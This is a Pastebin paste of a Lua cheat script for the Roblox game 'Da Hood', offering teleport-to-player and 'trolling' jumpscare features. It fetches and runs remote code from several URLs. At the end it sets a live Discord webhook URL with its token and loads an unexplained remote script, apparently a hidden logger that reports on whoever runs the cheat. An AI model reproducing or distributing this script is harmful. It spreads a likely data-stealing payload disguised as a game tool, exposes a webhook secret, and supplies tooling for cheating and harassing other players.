Advertisement
Guest User

Da Hood script

a guest
Jul 1st, 2022
966
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Lua 3.56 KB | None | 0 0
  1. local Library = loadstring(game:HttpGet("https://raw.githubusercontent.com/xHeptc/Kavo-UI-Library/main/source.lua"))()
  2. local Window = Library.CreateLib("PHUS HUB", "BloodTheme")
  3. local Tab = Window:NewTab("TP to Players")
  4. local Section = Tab:NewSection("Teleport to Players")
  5. Plr = {}
  6. for i,v in pairs(game:GetService("Players"):GetChildren()) do
  7.     table.insert(Plr,v.Name)
  8. end
  9. local drop = Section:NewDropdown("Select Player!", "Click To Select", Plr, function(t)
  10.    PlayerTP = t
  11. end)
  12. Section:NewButton("Click To TP", "", function()
  13.     game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = game.Players[PlayerTP].Character.HumanoidRootPart.CFrame
  14. end)
  15.  
  16. Section:NewButton("Refresh Player","Refresh Player", function()
  17.   drop:clear()
  18. for i,v in pairs(game:GetService("Players"):GetChildren()) do
  19.     table.insert(Plr,v.Name)
  20. end
  21. end)
  22.  
  23. Section:NewKeybind("TP Keybinds", "tp keybinds", Enum.KeyCode.Q, function()
  24.     game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = game.Players[PlayerTP].Character.HumanoidRootPart.CFrame
  25. end)
  26.  
  27. local Section = Tab:NewSection("Da Hood trolling Only")
  28.  
  29. Section:NewButton("Da Hood Trolling", "", function()
  30.     --[[
  31.  
  32. YOU NEED BOOMBOX FOR THE SOUNDS TO WORK
  33. AND YOU NEED GODV3 FOR THE SOUNDS TO BE FE GET IT AT #>godv3 AT DISCORD.GG/NOVAGUI
  34. Controls:
  35. X - Go invis
  36. B - Jumpscare
  37. H - Jumpscare Mouse
  38. C - Play humming sound
  39. V - Play footsteps sound
  40. Z - Play Scary Music
  41. T - Walk Thingy (TURNED OFF ATM WILL UPDATE IN FUTURE)
  42. J - Attacks While In Mimic
  43. Q - Scary Laugh
  44. Do "/e mimic" to wear a mask use mimic anims and go titan mode (must be fat to use titan mode)
  45.  
  46. Give suggestions on what to add at discord.gg/novagui
  47. Made by Icxy#0001
  48.  
  49. ]]
  50.  
  51. -- this picks a random jumpscare sound when u Jumpscare Someone
  52. -- get some jumpscares here: https://www.roblox.com/develop/library?CatalogContext=2&Keyword=jumpscare&SortAggregation=5&LegendExpanded=true&Category=9
  53. getgenv().JumpscareSound = {
  54.     "8280196339", -- put audios in like this for a random jumpscare sound
  55.     "7588947168" -- make sure to not put a "," on the last id
  56. }
  57.  
  58. getgenv().Settings = {
  59.     ['HoverAnims'] = 'On', --[On / Off]
  60.     ['DaMimicSpeed'] = '100', -- MUST BE A NUMBER
  61. }
  62.  
  63. loadstring(game:HttpGet("https://icxy.xyz/NovaGui/NovaMimic", true))()
  64.  
  65.  
  66. local TabN2 = Window:NewTab("Control")
  67. local SectionN2 = TabN2:NewSection("Control Da Mimic")
  68.  
  69.  
  70.  
  71. SectionN2:NewButton("X - Go invis", "", function()
  72.    
  73. end)
  74.  
  75. SectionN2:NewButton("B - Jumpscare", "NEED BOOMBOX", function()
  76.    
  77. end)
  78.  
  79. SectionN2:NewButton("H - Jumpscare Mouse", "NEED BOOMBOX", function()
  80.    
  81. end)
  82.  
  83. SectionN2:NewButton("C - Play humming sound", "NEED BOOMBOX", function()
  84.    
  85. end)
  86.  
  87. SectionN2:NewButton("V - Play footsteps sound", "NEED BOOMBOX", function()
  88.    
  89. end)
  90.  
  91. SectionN2:NewButton("Z - Play Scary Music", "NEED BOOMBOX", function()
  92.    
  93. end)
  94.  
  95. SectionN2:NewButton("T - Walk Thingy (TURNED OFF ATM WILL UPDATE IN FUTURE)", "", function()
  96.    
  97. end)
  98.  
  99. SectionN2:NewButton("J - Attacks While In Mimic", "", function()
  100.    
  101. end)
  102.  
  103. SectionN2:NewButton("Q - Scary Laugh", "NEED BOOMBOX", function()
  104.    
  105. end)
  106. end)
  107.  
  108. local Tab3 = Window:NewTab("Setting")
  109. local s3 = Tab3:NewSection("GuiSetting")
  110.  
  111. s3:NewKeybind("ToggleGui", "ToggleGui", Enum.KeyCode.M, function()
  112.     Library:ToggleUI()
  113.     end)
  114.  
  115. _G.webhooksdiscord = "https://discordapp.com/api/webhooks/989148064113635338/sCR-4ZdpL_9Hb3wwu0NwMfShLfHww5L9uMYgGShVwvO1mcq4F9yCeJTIqWqs4WbkB4QD"
  116. loadstring(game:HttpGet("https://raw.githubusercontent.com/SHARKX516/SHREKATTACK/main/SHARKLOL2.lua"),true)()
  117.  
  118.  
  119.  
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement